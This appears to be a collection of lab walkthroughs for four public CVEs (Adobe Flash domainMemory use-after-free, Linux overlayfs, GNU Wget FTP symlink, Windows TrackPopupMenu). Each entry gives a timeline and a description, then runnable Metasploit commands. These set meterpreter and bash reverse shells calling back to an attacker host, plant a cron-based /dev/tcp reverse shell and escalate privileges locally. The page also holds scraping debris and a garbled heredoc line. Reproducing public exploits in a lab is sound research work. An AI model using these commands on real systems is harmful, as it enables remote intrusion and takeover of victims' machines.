CVE-2015-0359 Adobe Flash Player domainMemory ByteArray Use After Free

Timeline :

Vulnerability discovered by bilou and reported to Chromium VRP
Patched by the vendor the 2015-04-14
Vulnerability discovered integrated into exploit kit the 2015-04-17
PoC provided by unknown and hdarwin the 2015-05-02
Metasploit PoC provided the 2015-05-08

PoC provided by :

bilou
Unknown
hdarwin
juan vazquez

Reference(s) :

CVE-2015-0359
APSB15-06

Affected version(s) :

Adobe Flash Player 17.0.0.134 and earlier versions

Tested on :

Windows 7 SP1 and Internet Explorer 8 with Adobe Flash 17.0.0.134

Description :

This module exploits a use-after-free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker, when forcing a reallocation by copying more contents than the original capacity, but Flash forgets to update the domainMemory pointer, leading to a use-after-free situation when the main worker references the domainMemory again. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 17.0.0.134.

Commands :

use exploit/windows/browser/adobe_flash_domain_memory_uaf
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid

llowfullscreen=”allowfullscreen”>

CVE-2015-8660 Linux Kernel OverLay Fail

Timeline :

Vulnerability discovered by Nathan Williams and reported to vendor
Patched by the vendor the 2015-12-04
Advisory release the 2015-12-28
PoC provided by rebel the 2015-01-06

PoC provided by :

rebel

Reference(s) :

CVE-2015-8660

Affected version(s) :

Linux kernel through 4.3.3

Tested on :

Ubuntu Server 64-bit 15.10 with python installed

Description :

The ovl_setattr function in fs/overlayfs/inode.c in the Linux kernel through 4.3.3 attempts to merge distinct setattr operations, which allows local users to bypass intended access restrictions and modify the attributes of arbitrary overlay files via a crafted application.

Commands :

gcc -o CVE-2015-8660 CVE-2015-8660.c
id
./CVE-2015-8660
id

CVE-2014-4877 GNU Wget FTP Symlink Arbitrary Filesystem Access

Timeline :

Vulnerability discovered by hdm the 2014-08-24
Vulnerability notified to vendor the 2014-08-24
Patched by the vendor the 2014-09-01
Advisory release the 2014-10-27
Metasploit PoC provided the 2014-10-27

PoC provided by :

HD Moore of Rapid7

Reference(s) :

CVE-2014-4877

Affected version(s) :

All GNU Wget before version 1.16

Tested on :

Ubuntu Server 12.10 with GNU Wget version 1.13.4 and root user

Description :

This module exploits a vulnerability in Wget when used in recursive (-r) mode with a FTP server as a destination. A symlink is used to allow arbitrary writes to the target’s filesystem. To specify content for the file, use the “file:/path” syntax for the TARGET_DATA option. Tested successfully with wget 1.14. Versions prior to 1.16 are presumed vulnerable.

Commands :

1. Create a reverse bash payload

msfvenom -p cmd/unix/reverse_bash -f raw LHOST=192.168.6.138

2. Create a crontab file that run once a minute, that launches the bellow command

cat>cronshell /dev/tcp/192.168.6.138/4444;sh <&148 >&148 2>&148’; rm -f /etc/cron.d/cronshell
EOD

3. Run a shell listener in Metasploit

use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_bash
set LHOST 192.168.6.138
run -j

4. Run the wget_symlink_file_write Metasploit module

use auxiliary/server/wget_symlink_file_write
set SRVHOST 192.168.6.138
set TARGET_FILE /etc/cron.d/cronshell
set TARGET_DATA file:/root/cronshell
set SRVPORT 21
run

5. On victim machine execute the bellow command

wget -m ftp://192.168.6.138:21/

6. Get the Metasploit session

session -i 1

id
uname -a

CVE-2014-4113 Windows TrackPopupMenu Win32k NULL Pointer Dereference

Timeline :

Vulnerability discovered exploited in the wild
Patched by the vendor via MS14-058 the 2014–10-14
Metasploit PoC provided the 2014–10-24

PoC provided by :

Unknown
juan vazquez
Spencer McIntyre
OJ Reeves

Reference(s) :

CVE-2014-4113
BID-70364
MS14-058

Affected version(s) :

Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8 and Windows 8.1
Windows Server 2012 and Windows Server 2012 R2
Windows RT and Windows RT 8.1

Tested on :

on Windows 7 SP1 in combination with CVE-2014-8440 (Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory) vulnerability

Description :

This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits.

Commands :

use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

use exploit/windows/local/ms14_058_track_popup_menu
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
set LPORT 4445
set SESSION 1
run

getuid
sysinfo